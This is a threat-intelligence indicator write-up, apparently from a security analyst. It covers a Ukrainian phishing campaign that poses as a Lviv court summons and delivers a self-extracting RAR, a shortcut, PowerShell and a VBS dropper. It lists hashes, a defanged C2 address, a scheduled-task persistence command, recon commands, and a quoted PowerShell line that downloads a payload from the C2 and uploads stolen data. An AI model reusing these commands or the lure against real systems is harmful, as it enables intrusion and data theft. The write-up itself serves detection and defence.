#script_recon_081123

1. #IOC #OptiData #VR #WSH #RAR #SFX #powershell #task
2.  
3. https://pastebin.com/rpFYCNPS
4.  
5. attack_vector
6. --------------
7. email attach .rar (sfx) > .lnk > ps > task > Libraries.vbs > connect > recon > exfil
8.  
9.  
10. # # # # # # # #
11. email_headers
12. # # # # # # # #
13. Date: Wed, 08 Nov 2023 11:48:25 +0200
14. Subject: Розсилка процесуальних документів, справа № 623/6341/11, Судова повістка про виклик в суд.
15. From: СПД 3.9 (Франківський районний суд м.Львова) <spd.1331.ics.gov@ukr.net>
16.  
17. # # # # # # # #
18. files
19. # # # # # # # #
20. SHA-256 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
21. File name Повiстка-623-6341-11.rar [ WinRAR Self Extracting archive ]
22. File size 331.92 KB (339886 bytes)
23.  
24. SHA-256 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
25. File name Повiстка-623-6341-11.docx.lnk [ Windows shortcut ]
26. File size 19.86 KB (20332 bytes)
27.  
28. SHA-256 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
29. File name Libraries.vbs [ WSH ]
30. File size 747 B (747 bytes)
31.  
32. SHA-256 f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
33. File name 623-6341-11.docx [ Microsoft Word 2007+ ]
34. File size 13.52 KB (13840 bytes)
35.  
36. # # # # # # # #
37. activity
38. # # # # # # # #
39.  
40. PL_SCR email_attach
41.  
42. C2 196.196. 156{ .2
43.  
44.  
45. netwrk
46. --------------
47. 196.196. 156{ .2 196.196. 156{ .2:57881 57881 HTTP GET /HcKOAhaZgDePKGKF/page213/upgrade.txt HTTP/1.1
48. 196.196. 156{ .2 196.196. 156{ .2:49210 49210 HTTP POST /page213 HTTP/1.1
49.  
50. comp
51. --------------
52. powershell.exe 916 196.196. 156{ .2 57881
53. powershell.exe 916 196.196. 156{ .2 49210
54.  
55. proc
56. --------------
57.  
58. powershell.exe ...
59. WINWORD.EXE /n /dde
60. schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs /f
61.  
62. {another context}
63.  
64. WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
65. powershell.exe net.webclient;$flm=$iik.
66. downloaddata ('196.196.156{ .2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');
67. uploaddata('196.196.156{ .2:49210/page213',$drpy);}
68. ...
69. whoami.exe
70. systeminfo.exe
71. ipconfig.exe
72. net.exe" view
73. ROUTE.EXE print -4 -6
74. RP.EXE -a
75. NETSTAT.EXE -ant
76. TRACERT.EXE 8.8.8.8
77.  
78. persist
79. --------------
80. \ExplorerCoreUpdateTaskMachine C:\Users\Public\Libraries\Libraries.vbs [task]
81.  
82.  
83. drop
84. --------------
85. %temp%\623-6341-11.docx
86. C:\Users\Public\Libraries\Libraries.vbs
87.  
88.  
89. # # # # # # # #
90. additional info
91. # # # # # # # #
92.  
93.  
94. # # # # # # # #
95. VT & Intezer
96. # # # # # # # #
97. https://www.virustotal.com/gui/file/86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a/details
98. https://www.virustotal.com/gui/file/762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378/details
99. https://www.virustotal.com/gui/file/39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe/details
100. https://www.virustotal.com/gui/file/f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e/details
101.  
102. VR